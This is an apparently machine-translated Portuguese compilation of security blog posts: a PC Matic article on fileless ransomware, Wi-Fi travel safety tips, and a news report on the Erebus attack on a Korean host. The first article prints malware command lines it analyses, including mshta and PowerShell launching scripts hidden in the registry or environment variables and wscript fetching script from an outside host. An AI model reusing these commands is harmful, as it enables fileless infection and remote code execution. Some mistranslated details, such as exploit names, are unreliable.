Infecções sem arquivo - o último truque de Ransomware

Se alguém pensou que o susto do Ransomware WannaCry de maio de 2017 era ruim, é apenas o começo. Todos os anos, à medida que são pagos mais resgates, os cibercriminosos têm mais capital para investir em novas tecnologias e técnicas. Uma de suas técnicas mais promissoras é infecções sem arquivo ou ataques de script.

Historicamente, o malware e agora o ransomware furtivamente um programa em um computador, e então, abertamente ou secretamente, tentaram a execução desse arquivo. O tópico comum nesses ataques é que um arquivo é baixado e, em seguida, tenta executar. A arquitetura do software antivírus emprega um driver de sistema de arquivos. Esse driver trava o arquivo e depois determina se ele pode ser executado.

Um malware sem arquivo não descarta um arquivo e ignora o driver do sistema de arquivos do AV mainstream. Em vez disso, os scripts são escritos e executados através de conhecidos mecanismos de script, como Powershell, MSHTA, Cscript e Wscript. Mostre e diga a hora.

C: \ WINDOWS \ system32 \ mshta.exe "javascript: QNm90c =" 8YNUG "; S07R = novo ActiveXObject ("WScript.Shell"); E91eHqEE = "l"; L21MJb = S07R.RegRead ("HKCU \\ software \\ lfxqiypm \\ qkkqsiqrqk"); G0dn1w = "jSJKZ"; Eval (l21MJb); GQEXz2t = "apyD"; "

 

O comando acima invoca o MSHTA, que é um conhecido bem conhecido aplicativo Microsoft. O comando chama Javascipt, que por sua vez chama Wscript para executar um script a partir de uma chave de registro com caracteres aleatórios. Uma vez que o script reside em uma chave de registro, não há nenhum arquivo para o driver do sistema de arquivos para analisar.

 

"C: \ WINDOWS \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe" iex $ env: kuihcdc

O comando acima instrui o Powershell, outro mecanismo de script Microsoft válido, para executar um script a partir de uma variável de ambiente com caracteres aleatórios. Uma vez que o script reside em uma variável de ambiente em vez de um arquivo, o driver do sistema de arquivos tem visibilidade zero neste tipo de atividade.

Wscript // B // E: JScript OTTYUADAF "gexywoaxor" "http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDP g5_U_kDbMAl19pucJOw6mF4&es_sm=140&

O comando acima executa o Wscript, outro mecanismo de script Microsoft válido e, em seguida, muda para o Javascript e executa o script diretamente de um site com uma seqüência de consulta gnarly. Vamos pensar sobre isso. O comando acima está instruindo wscript a executar o código diretamente de um site externo sem um arquivo atingindo o driver do sistema de arquivos.

 

Se alguém faz uma pesquisa na estranha string "gexywoaxor", descobre-se que esse malware é um trojan bancário chamado Zeus Panda descoberto por Forcepoint.

O artigo está datado de julho de 2016 e o ​​PC Matic bloqueou a amostra em novembro de 2016, 4 meses depois.

	Amostra de ponto de força	Amostra PC Matic
Encontro	Julho de 2016	Novembro de 2016
Mecanismo de script	Wscript	Wscript
Nome do arquivo de script	R3ak.tmp	OTTYUADAF
Chave de criptografia	Gexwoaxor	Gexwoaxor
URL	Ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh	Hit.thincoachmd.com

 

Nesses quatro meses, houve mudanças visíveis no método de ataque, no entanto, a chave de criptografia crítica "gexywoaxor" permaneceu inalterada. O fato de que uma nova chave de criptografia não era necessária era um sinal de que este vírus tinha sucesso na entrega da sua carga útil.

Os ataques de script ou infecções sem arquivo estão aqui hoje. 25% de todos os blocos de PC Matic de malware estão no nível de script. De forma justa, no ambiente de hoje, com freqüência, um ataque de script envolve o lançamento de um arquivo mais tarde para ser executado. Nesse caso, há um segundo ponto em que uma abordagem de placa de arquivos / lista negra pode capturar e bloquear a intrusão. O problema é que nem todos os ataques de script soltam um arquivo e isso representa um buraco de segurança no antivírus da sua empresa.

Segurança Wi-Fi quando viajando - Dicas e precauções a serem tomadas

 

A segurança cibernética não é apenas proteger seu PC e dispositivos móveis dos ataques de Trojans e Malware; É mais sobre a segurança de suas redes. Você precisa proteger todas as partes da sua rede. Um Wi-Fi público gratuito e aberto geralmente traz um sorriso no rosto de todos, mas o fato é que essas redes abertas de Wi-Fi públicas são altamente propensas a ataques cibernéticos, especialmente quando você está viajando. Existem vários perigos de usar um ponto de acesso Wi-Fi público . Nesta publicação, aprenderemos sobre a segurança Wi-Fi e algumas dicas e precauções a serem tomadas para acessar de forma segura a Internet ao viajar. Essas maneiras simples protegerão sua rede dos ataques Wi-Fi em qualquer lugar.

Para evitar esses ataques, primeiro você precisa saber de que tipo de ataques sua rede Wi-Fi é propensa. Alguns dos ataques mais difíceis e prejudiciais incluem Sniffing, Sidejacking e Engenharia Social.

1 - Sniffing , que é um ataque passivo, baseia-se basicamente em um software sniffer que rouba os dados que passam por uma rede de informática. Enquanto os sniffers de pacotes são realmente projetados para hackers éticos, solução de problemas e análise de dados, os cibercriminosos o usam para intrusar em sua rede e roubar os dados. Alguns ataques de sniffing típicos incluem: sniff de LAN, sniff de protocolo, ARP sniff e sniffing de senha da Web. Os hackers podem roubar suas senhas sobre Wi-Fi usando esta técnica!

2 - Sidejacking , também conhecido como seqüestro de sessão é um tipo de ataque Wi-Fi onde os atacantes usam seus cookies para representar sua conta e entrar em qualquer site. Enquanto os sites codificam seu processo de login, eles nunca criptografam seus cookies tornando sua conta vulnerável. Uma rede Wi-Fi aberta compartilha os cookies da sessão através do ar, o que torna sua rede ainda mais vulnerável e propensa a atacar.

3 - A engenharia social é um tipo de ataque onde os atacantes enganam os usuários para quebrar seus sistemas de segurança regulares. É mais como enganar os usuários. Os ataques de engenharia social de uso comum incluem: clique em iscas, phishing , scareware e pretexto.

Agora, quando você está ciente desses ataques comuns de Wi-Fi, vamos falar sobre algumas dicas e precauções a serem tomadas para acessar de forma segura a Internet ao viajar.

Segurança Wi-Fi quando viajando

Mantenha o seu WiFi desligado

Geralmente, todos temos o hábito de manter nosso WiFi aberto em nossos dispositivos móveis que se conecta automaticamente a uma rede WiFi pública aberta que não é segura. Mantenha o seu WiFi desligado e ligue-o apenas quando quiser usar a internet. Não é recomendado usar as conexões WiFi públicas a menos que você tenha algo realmente importante a fazer. As conexões WiFi abertas que não estão protegidas com uma senha geralmente são perigosas, pois qualquer pessoa que use o mesmo WiFi pode interferir e cortar seu dispositivo. Todos os seus detalhes de login estão no ar.

Usar VPN

Uma rede privada virtual, muitas vezes denominada VPN, é um tipo de túnel privado da sua rede, o que lhe garante a intrusão indesejada. Durante a viagem, muitas vezes usamos conexões Wi-Fi públicas para nossas transações de dinheiro on-line, que podem ser perigosas. Mas se você estiver usando uma VPN, esconderá todas as suas atividades na internet dos atacantes. É bastante fácil configurar uma VPN para dispositivos móveis, laptops e tablets. Existem vários softwares VPN gratuitos que você pode usar.

As estações de cobrança públicas não são seguras

Você já ouviu falar sobre Juice Jacking ? É uma maneira de roubar todos os dados armazenados no seu telefone através do cabo de carregamento USB. Quando você usa a porta USB de estações de carregamento público, você está realmente concedendo aos hackers para acessar todos os seus dados sem saber. É sempre melhor ter seu próprio banco de energia e não usar as estações de carregamento público para seus telefones celulares.

Configurações de compartilhamento

Antes de se conectar ao Wi-Fi público, verifique se as configurações de compartilhamento em seus dispositivos estão desligadas. Manter essas configurações, ON, leva a um roubo de dados obviamente.

Carregar um dispositivo habilitado para Ethernet

Sim, não podemos imaginar nossas vidas sem a internet, mas usar o WiFi público não é uma boa opção. Se você é viajante de negócios e precisa necessitar do acesso à internet em qualquer lugar, sugere-se transportar sua própria porta Ethernet e um dispositivo habilitado para Ethernet.

Hotspot pessoal

Embora esta seja uma opção cara, mas é a melhor para os viajantes de negócios, que precisam estar online sempre. Um ponto de acesso privado / pessoal vem em planos pré-pagos e pós-pagos. O hotspot pessoal protege sua atividade online e criptografa todos os seus detalhes. Todas as suas atividades on-line, incluindo as transações de dinheiro, são garantidas.

Wi-Fi Dicas para viajantes internacionais

Quando você está viajando internacionalmente, você realmente precisa ficar conectado com as pessoas em seu país de origem e a internet é a única saída. Assim, torna-se ainda mais importante manter o cuidado e a vigilância sobre o uso das redes WiFi públicas e tomar algumas etapas básicas para garantir-se em hotspots WiFi públicos para proteger seus dados ao usar redes sem fio não seguras.

• Você precisa usar um software VPN, pois criptografará todos os dados que seu PC envia para que não seja hackeável.
• Monitore sua conexão Bluetooth em locais públicos para garantir que outros não interceptem sua transferência de dados.
• Usar as redes não criptografadas é altamente arriscado, pois todos os seus detalhes são facilmente hackeáveis.
• Manter o WiFi desligado quando não está em uso é outra dica muito importante.
• Além disso, é preciso evitar o download ou a instalação de atualizações nos dispositivos quando viaja internacionalmente. Isso ocorre porque os hackers costumam enganar os usuários com tais notificações de atualização para entrar no seu sistema.

É melhor se você pode usar uma conexão por cabo ou comprar um plano de dados ilimitado para o seu dispositivo e parar de usar o Wi-Fi público completamente

Ransomware sequestra 153 servidores Linux e empresa teve que pagar R$ 3 milhões para descriptografar.

 

Ransomware sequestra 153 servidos Linux e empresa teve que pagar R$ 3 milhões de resgate.

O provedor de hospedagem  web sul-coreano concordou em pagar US$ 1 milhão em bitcoins para crackers depois que um ransomware Linux infectou seus 153 servidores, criptograficando 3.400 sites de negócios e seus dados hospedados neles.

De acordo com uma publicação no blog publicada pela NAYANA, a empresa de hospedagem na web, este evento infeliz aconteceu no dia 10 de junho, quando o malware do Ransomware atingiu seus servidores de hospedagem e o atacante exigiu 550 bitcoins (mais de US$ 1,6 milhão) para desbloquear os arquivos criptografados.

No entanto, a empresa negociou mais tarde com os cibercriminosos e concordou em pagar 397,6 bitcoins (cerca de US$ 1,01 milhão) em três parcelas para que seus arquivos fossem descriptografados.

A empresa de hospedagem já pagou duas parcelas no momento da redação e pagaria a última parcela do resgate depois de recuperar dados de dois terços dos servidores infectados.

De acordo com a empresa de segurança Trend Micro, o Ransomware usado no ataque foi o Erebus que foi detectado em setembro do ano passado e foi visto em fevereiro deste ano com as capacidades de desvio de controle de conta de usuário do Windows.

Uma vez que os servidores de hospedagem estavam sendo executados no kernel do Linux 2.6.24.2, os pesquisadores acreditam que o Ransomware do Erebus Linux pode ter usado vulnerabilidades conhecidas, como SUTY VW; Ou uma aplicação local do Linux para assumir o acesso raiz do sistema.

"A versão do Apache NAYANA usada é executada como um usuário de ninguém (uid = 99), o que indica que uma exploração local também pode ter sido usada no ataque", observa o pesquisador.

"Além disso, o site da NAYANA usa o Apache versão 1.3.36 e PHP versão 5.1.4, ambos lançados em 2006."

Erebus, o ransomware que visa principalmente usuários na Coréia do Sul, criptografa documentos de escritório, bancos de dados, arquivos e arquivos multimídia usando o algoritmo RSA-2048 e, em seguida, anexa-os com uma extensão .ecrypt antes de exibir a nota de resgate.

"O arquivo primeiro é codificado com criptografia RC4 em blocos de 500kB com chaves geradas aleatoriamente", dizem os pesquisadores. "A chave RC4 é então codificada com o algoritmo de criptografia AES, que é armazenado no arquivo. A chave AES é novamente criptografada usando o algoritmo RSA-2048 que também é armazenado no arquivo."

A chave pública que é gerada localmente é compartilhada, enquanto a chave privada é criptografada usando criptografia AES e outra chave gerada aleatoriamente.

De acordo com a análise realizada pelos pesquisadores da Trend Micro, a descriptografia de arquivos infectados não é possível sem se apoderar das chaves RSA.

Então, a única maneira segura de lidar com ataques de resgate é a prevenção. Como recomendamos anteriormente, a melhor defesa contra o Ransomware é criar conscientização dentro das organizações, bem como para manter backups que são rodados regularmente.

A maioria dos vírus é introduzida abrindo anexos infectados ou clicando em links para malwares geralmente em e-mails de spam. Portanto, NÃO CLIQUE em links fornecidos em e-mails e anexos de fontes desconhecidas.

Além disso, assegure-se de que seus sistemas estejam executando a versão mais recente dos aplicativos instalados.


Fonte: The Hacker News